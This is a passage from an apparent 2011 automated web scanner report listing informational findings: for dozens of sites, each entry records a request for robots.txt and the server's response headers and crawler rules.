Last-Modified: Mon, 25 Apr 2011 15:32:08 GMT
ETag: "66860-624-4a1bfe912ee00"
Accept-Ranges: bytes
Content-Length: 1572
Content-Type: text/plain
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 00:45:22 GMT
Date: Mon, 02 May 2011 00:45:22 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.335. http://www.orlandojobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandojobs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orlandojobs.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 00:52:56 GMT
Content-Length: 165
Content-Type: text/plain
Last-Modified: Sun, 29 Apr 2007 22:33:10 GMT
Accept-Ranges: bytes
ETag: "461a955dae8ac71:784"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow: /e_report_job_stats_email.asp
Disallow: /search/daily_GOJsearchagent_act.asp
Disallow: /site_jobsearch.asp
Disallow: /c_searchresults.asp
30.336. http://www.oshkosh365.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oshkosh365.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 16 Jun 2009 14:02:15 GMT
Accept-Ranges: bytes
ETag: "e1417ad8beec91:1198"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Mon, 02 May 2011 00:01:15 GMT
Age: 68974
Content-Length: 74

User-agent: *
Disallow: /WebResource.axd*
Disallow: /ScriptResource.axd*
30.337. http://www.oshkoshbgosh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkoshbgosh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oshkoshbgosh.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:37 GMT
Server: Apache
Content-Length: 158
Cache-Control: public;max-age=76425
Expires: Mon, 02 May 2011 21:58:22 GMT
Last-Modified: Sun, 01 May 2011 21:58:22 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

Sitemap: http://www.carters.com/sitemap1_default.xml
User-agent: *
Disallow: /*/Wishlist-Show
Disallow: /*/Account-Show?id=carters
Disallow: /*/Cart-Show
30.338. http://www.ourmidland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourmidland.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourmidland.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2080228
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:14:48 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0316
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: ourmidland.com
X-TNCMS-Served-By: cmsapp7
Content-Length: 796

User-agent: Slurp
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Googlebot
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Mediapartners-Go
...[SNIP]...
30.339. http://www.ourprayer.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourprayer.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 15 Apr 2011 05:09:53 GMT
Accept-Ranges: bytes
ETag: "e381fc5a2bfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:44 GMT
Connection: close
Content-Length: 61
Set-Cookie: cookie1=4090937773.1.3717150784.2424965831; path=/

User-agent: *
Disallow: /stage/
Disallow: /qppage404.aspx
30.340. http://www.outdoor-babes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoor-babes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoor-babes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Sun, 01 May 2011 23:29:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 06 Jan 2009 18:18:26 GMT
ETag: "30b816e-27-45fd46ef38080"
Accept-Ranges: bytes
Content-Length: 39

User-agent: *
Disallow:
Allow: *

30.341. http://www.outdoorjp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorjp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorjp.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:02 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 12:39:18 GMT
ETag: "26c4e8e-19-4cb6f9f6"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
30.342. http://www.oxfamamerica.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oxfamamerica.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oxfamamerica.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:53:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Cache-Headers-Set-By: CachingPolicyManager: /oxfam/caching_policy_manager
Expires: Thu, 03 May 2001 23:35:38 GMT
Last-Modified: Mon, 16 Nov 2009 11:22:15 GMT
X-Caching-Rule-Id: downloads
Cache-Control: max-age=0, s-maxage=86400, must-revalidate, proxy-revalidate
X-Header-Set-Id: cache-in-proxy-24-hours
Content-Length: 766
X-Varnish: 2109309786 2109297003
Age: 4651
Via: 1.1 varnish

# Define access-restrictions for robots/spiders
# http://www.robotstxt.org/wc/norobots.html


# By default we allow robots to access all areas of our site
# already accessible to anonymous users

Use
...[SNIP]...
30.343. http://www.pal-item.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pal-item.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pal-item.com

Response

HTTP/1.0 200 OK
Content-Length: 797
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:21:32 GMT
Accept-Ranges: bytes
ETag: "0a69b76d879cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Mon, 02 May 2011 00:14:39 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...
30.344. http://www.pashnit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pashnit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pashnit.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:24:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 08 Dec 2007 11:24:33 GMT
Accept-Ranges: bytes
Content-Length: 158
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

User-agent: Slurp
Crawl-delay: 60
30.345. http://www.patdollard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.patdollard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.patdollard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 11 Oct 2009 06:11:13 GMT
ETag: "3da0d7e-28-ae1b0240"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
crawl-delay: 60
30.346. http://www.pdga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pdga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pdga.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:01 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 16:51:48 GMT
ETag: "c-6c8-49ccdadfb5100"
Accept-Ranges: bytes
Content-Length: 1736
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:14:01 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt 792 2008-12-11 07:28:45Z elmuerte $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.347. http://www.pearljam.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pearljam.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pearljam.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 02 May 2011 00:19:32 GMT
Content-Type: text/plain
Content-Length: 1572
Last-Modified: Tue, 15 Mar 2011 06:17:20 GMT
Connection: close
Accept-Ranges: bytes

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.348. http://www.pearsoncmg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pearsoncmg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pearsoncmg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:53 GMT
Last-Modified: Wed, 17 Oct 2007 13:32:03 GMT
ETag: "4ecc8-68-47160ed3"
Accept-Ranges: bytes
Content-Length: 104
Content-Type: text/plain
Connection: close


User-agent: gsa-crawler
Disallow:

User-agent: WPS_Site_Robot
Disallow:

User-agent: *
Disallow: /


30.349. http://www.petri.co.il/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petri.co.il
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petri.co.il

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:25:08 GMT
Content-Type: text/plain
Content-Length: 5602
Last-Modified: Mon, 23 Mar 2009 20:47:34 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: BotRightHere
Disallow: /


User-agent: larbin
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: Copernic
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disal
...[SNIP]...
30.350. http://www.pfaw.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pfaw.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pfaw.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:09:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 19 Feb 2010 14:40:21 GMT
ETag: "270a7e-636-47ff5101e9f40"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:09:38 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.351. http://www.philabundance.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.philabundance.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.philabundance.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:53 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Wed, 11 Aug 2010 18:30:39 GMT
ETag: "8f25b-330-48d90724871c0"
Accept-Ranges: bytes
Content-Length: 816
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...
30.352. http://www.pinkemo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pinkemo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pinkemo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 09 Sep 2010 06:18:26 GMT
Accept-Ranges: bytes
ETag: "c0250d0e64fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:27:48 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /

30.353. http://www.playmobilusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playmobilusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playmobilusa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:33 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 06:57:21 GMT
ETag: "3e0a-a4-580e3640"
Accept-Ranges: bytes
Content-Length: 164
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-Agent: *
Disallow: /
Allow: /index.html
Allow: /sitemap_com.xml
Allow: /MICROSITES/
Allow: /MICROSITES/TOPAGENTS/DE
Allow: /GREEK/
Sitemap: /sitemap_com.xml


30.354. http://www.plccenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plccenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plccenter.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:06:13 GMT
Connection: close
Content-Length: 1871

#control which bots crawl the site
#copy this file to root folder of web site

User-agent: adidxbot
Crawl-delay: 10
Disallow: /Cart
Disallow: /Cart/
Disallow: /Content/
Disallow: /Scripts/
Di
...[SNIP]...
30.355. http://www.plosone.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plosone.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plosone.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:15 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=2F605AA2C4AFF4A83287170B085EEF11.ambra02; Path=/; HttpOnly
ETag: W/"512-1303955986000"
Last-Modified: Thu, 28 Apr 2011 01:59:46 GMT
Content-Length: 512
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:45:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-95144505=9514450c:0; path=/

User-agent: 008
Disallow: /

User-agent: *
Crawl-delay: 30
Disallow: /admin/
Disallow: /annotation/secure/
Disallow: /article/emailArticle.action
Disallow: /article/feed/
Disallow: /article/fetchObjec
...[SNIP]...
30.356. http://www.popdose.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popdose.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popdose.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:24:33 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://popdose.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Vary: User-Agent
Vary: Accept-Encoding

User-agent: *
Disallow:
30.357. http://www.popular-wedding-songs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popular-wedding-songs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popular-wedding-songs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:41 GMT
Server: Apache/2.2.2 (Unix) PHP/5.1.4
Last-Modified: Tue, 27 Sep 2005 12:01:19 GMT
ETag: "d1409-59-a23b01c0"
Accept-Ranges: bytes
Content-Length: 89
Connection: close
Content-Type: text/plain

User-Agent: Googlebot-Image
Disallow: /

User-agent: Mediapartners-Google*
Disallow:


30.358. http://www.ppld.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ppld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ppld.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:13 GMT
Server: Apache/2.2.6 (Win32) mod_aspdotnet/2.2 PHP/5.2.6
Last-Modified: Wed, 10 Dec 2008 19:12:20 GMT
ETag: "16c6d-673-9ff4d00"
Accept-Ranges: bytes
Content-Length: 1651
Vary: Accept-Encoding,User-Agent
X-Powered-By: ASP.NET
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
30.359. http://www.pregnancyguideonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pregnancyguideonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pregnancyguideonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 10 Apr 2008 19:58:32 GMT
ETag: "2c4831c-8f-3df12a00"
Accept-Ranges: bytes
Content-Length: 143
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /ip/
Disallow: /bin/
Disallow: /log/
User-agent: Googlebot-Image
Disallow: /


30.360. http://www.prontotech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prontotech.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prontotech.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:06 GMT
Server: Apache/2.2.4 (Fedora)
ETag: W/"239-1254341704000"
Last-Modified: Wed, 30 Sep 2009 20:15:04 GMT
Content-Length: 239
Content-Type: text/plain;charset=UTF-8
Set-Cookie: JSESSIONID=1333CCEE7F85DBC9F8F4DF047EF2FA44; Path=/
Set-Cookie: SESSIONID=465326773; Path=/
Set-Cookie: abt=ProntoV3_5_9-1.199-cellNum_2; Expires=Tue, 31-May-2011 23:29:06 GMT; Path=/
Set-Cookie: M_ID=3cc77942-12fadc77c81-6cc7; Expires=Tue, 30-Apr-2013 23:29:06 GMT; Path=/
Set-Cookie: V_ID=3cc77942-12fadc77c81-6cc8; Path=/
_eep-Alive: timeout=15
_onnection: Keep-Alive
Via: CN-5000
Connection: close

User-agent: Sosospider
Disallow: /

User-agent: *
Disallow: /user/
Disallow: /client/
Disallow: /account/
Disallow: /images/
Disallow: /js/
Disallow: /css-global/
Disallow: /css-local/

Sitemap: http:
...[SNIP]...
30.361. http://www.ptla.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ptla.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ptla.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 15 Mar 2011 20:24:39 GMT
ETag: "3868066-673-49e8b37b38fc0"
Accept-Ranges: bytes
Content-Length: 1651
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:38:27 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
30.362. http://www.pumpkinlabs.com/ads/ad-geo-contextual.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pumpkinlabs.com
Path:   /ads/ad-geo-contextual.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pumpkinlabs.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=b5n3bbqk5mr16uum9r2n3iai30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.pumpkinlabs.com/xmlrpc.php
Content-Length: 76
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.pumpkinlabs.com/sitemap.xml.gz
30.363. http://www.qbike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qbike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qbike.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.11 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 12 Jan 2011 05:18:15 GMT
Accept-Ranges: bytes
Content-Length: 882
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.qbike.com/

User-agent: *
Disallow: /cgi-bin/item.cgi
Disallow: /cgi-bin/site.cgi
Disallow: /cgi-bin/ebay.cgi
Disallow: /cgi-bin/goto.cgi
Disallow: /cgi-bin/other.cgi
Disal
...[SNIP]...
30.364. http://www.questcomp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcomp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.questcomp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=21600
Content-Length: 924
Content-Type: text/plain
Last-Modified: Mon, 20 Apr 2009 15:06:51 GMT
Accept-Ranges: bytes
ETag: "5dd8ca2c9c1c91:14b8"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:32 GMT
Connection: close

# in webrfq, only files allowed are Featuredparts, QuestDetailsAll and ZQuestDetails
User-agent: *
Disallow: /Ajax/
Disallow: /App_Themes/
Disallow: /Archive/
Disallow: /aspnet_client/
Disallow:
...[SNIP]...
30.365. http://www.quiltingboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltingboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quiltingboard.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:37 GMT
Set-Cookie: JSESSIONID=5CDCE678359BDCE34D253936C6FA07CB; Path=/
Accept-Ranges: bytes
ETag: W/"1506-1291748018000"
Last-Modified: Tue, 07 Dec 2010 18:53:38 GMT
Content-Type: text/plain
Content-Length: 1506
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/
Vary: Accept-Encoding

User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot
User-agent: Googlebot-Image
User-agent: Adsbot-Google
User-agent: msnbot
User-agent: Slurp
User-agent: Yahoo-MMCrawler
User-agent: Teo
...[SNIP]...
30.366. http://www.quizrocket.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quizrocket.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quizrocket.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:04:51 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi TELi OUR DELi SAMi STP IND PHY ONL UNI DEM PRE"
Status: 200
X-Quazar: ec2-184-73-63-134
Content-Length: 384
X-Varnish: 768506486
Via: 1.1 varnish
Cache-Control: max-age=3600, proxy-revalidate
Age: 0
X-Cache: MISS
X-QuazarCache: production_a

User-Agent: *
Disallow: /*gatherer_id*
Disallow: /challenge
Disallow: /results
Disallow: /block_postal
Disallow: /unsubscribe
Disallow: /privacy
Disallow: /*/n/
Disallow: /*q_result*
Disallow: /aladdi
...[SNIP]...
30.367. http://www.rappahannock.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rappahannock.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rappahannock.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:09 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 17:31:54 GMT
Accept-Ranges: bytes
Content-Length: 173
Cache-Control: max-age=86400
Expires: Tue, 03 May 2011 00:05:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

Sitemap: http://www.rappahannock.edu/sitemap.xml
30.368. http://www.rc-airplane-world.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rc-airplane-world.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rc-airplane-world.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:53:13 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.rc-airplane-world.com/r5FdlQz6.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...
30.369. http://www.redcounty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcounty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcounty.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:11 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 02 Mar 2011 16:27:20 GMT
ETag: "636-49d82630dca00"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:05:11 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
